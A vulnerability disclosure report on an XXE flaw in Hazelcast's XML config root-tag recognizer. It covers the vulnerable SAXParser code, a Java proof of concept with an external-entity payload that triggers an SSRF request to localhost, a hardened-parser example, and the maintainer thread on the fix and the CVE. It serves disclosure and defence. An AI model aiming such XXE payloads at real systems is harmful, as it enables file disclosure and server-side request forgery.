Improper Restriction of XML External Entity Reference in hazelcast/hazelcast

Valid

Reported on

Jan 16th 2022


Description

The AbstractXmlConfigRootTagRecognizer() constructor uses a SAXParser obtained from a SAXParserFactory on which FEATURE_SECURE_PROCESSING is never set, so the parser resolves external entities and the config file is open to XXE attacks. The relevant code is at https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65

    public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
        this.expectedRootNode = expectedRootNode;
        // Default factory: no secure-processing feature, DOCTYPE and external entities allowed
        SAXParserFactory factory = SAXParserFactory.newInstance();
        saxParser = factory.newSAXParser();
    }

    @Override
    public boolean isRecognized(ConfigStream configStream) throws Exception {
        MemberHandler memberHandler = new MemberHandler(expectedRootNode);
        try {
            // Untrusted config content is parsed with the unhardened parser
            saxParser.parse(configStream, memberHandler);
        }
        // ... (excerpt ends here in the linked source range)

Proof of Concept

The key function mentioned above, extracted into a stand-alone program to show how it can be exploited:

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

public class Poc {

    public static void main(String[] args) {
        try {
            // Document declaring an external entity that points at a local HTTP server
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            // Same construction as in AbstractXmlConfigRootTagRecognizer: no features set on the factory
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            // The parser resolves &xxe; by fetching the SYSTEM URL before any handler code runs
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes(StandardCharsets.UTF_8)), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Running this causes an SSRF request to http://127.0.0.1.
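For comparison, the hardened parser setup below is an added example and not Hazelcast's own fix (that lives in the PR linked further down); it assumes a hypothetical helper class and feeds it the PoC document from the report plus a constructed benign root tag, showing that the entity-bearing document is rejected before any network request can happen.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

import java.io.IOException;
import java.io.StringReader;

// Hypothetical hardened variant of the recognizer's parser setup (example code, not the project's fix).
public class HardenedRootTagCheck {

    static SAXParser newHardenedParser() throws ParserConfigurationException, SAXException {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // Blanket JAXP secure-processing limits (entity expansion limits, restricted access)
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Config files never need a DOCTYPE; rejecting it blocks internal and external entities outright
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces in case the parser implementation does not honour the feature above
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        return factory.newSAXParser();
    }

    // true when the document parses, false when the hardened parser rejects it
    static boolean parses(String xml) throws ParserConfigurationException, SAXException {
        try {
            newHardenedParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (SAXException | IOException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: the report's PoC document and a benign config root element
        String xxe = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
        String benign = "<?xml version=\"1.0\"?><hazelcast></hazelcast>";
        System.out.println("xxe document parses: " + parses(xxe));
        System.out.println("benign document parses: " + parses(benign));
    }
}
```

The DOCTYPE rejection fires during parsing of the prolog, so the SYSTEM URL is never contacted; the benign document still parses normally.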

Impact

This XXE vulnerability can be used to disclose data, conduct SSRF attacks, and so on.

We are processing your report and will contact the hazelcast team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
Josef Cacek validated this vulnerability 4 months ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Josef Cacek (Maintainer), 4 months ago:
The fix is on the way: https://github.com/hazelcast/hazelcast/pull/20407

Josef Cacek (Maintainer), 4 months ago:
Even though the class is not new, the only affected version seems to be the enterprise version of the latest beta (5.1-BETA-1). I didn't find a valid call path (other than ones from tests) in previous releases.

Jamie Slome (Admin), 4 months ago:
With this PR merged, has this been fixed? If so, we can go ahead and confirm the fix against the report ♥️

Josef Cacek (Maintainer), 4 months ago:
The PR is merged and the fix will be included in Hazelcast 5.1. I would like to publish the report after the new version is released. The plan is to have the new version out in February.

Jamie Slome (Admin), 4 months ago:
Okay, thanks for the update Josef and that makes sense.

We will confirm the fix for this report once you are ready to publish the report!

Josef Cacek confirmed that a fix has been merged on 4d6b66 3 months ago
The fix bounty has been dropped
Josef Cacek (Maintainer), 2 months ago:
@jamieslome, how can we change the description of the CVE to explicitly state the vulnerable version (5.1-BETA-1)? It currently says "repository hazelcast/hazelcast prior to 5.1."

Jamie Slome (Admin), 2 months ago:
@kwart - I have updated the CVE for you 👍

https://github.com/CVEProject/cvelist/pull/5209/files

The description will now reflect the vulnerable version instead of 5.1. Please allow 1 hour for the CVE to update.

Josef Cacek (Maintainer), 2 months ago:
Thanks, Jamie.
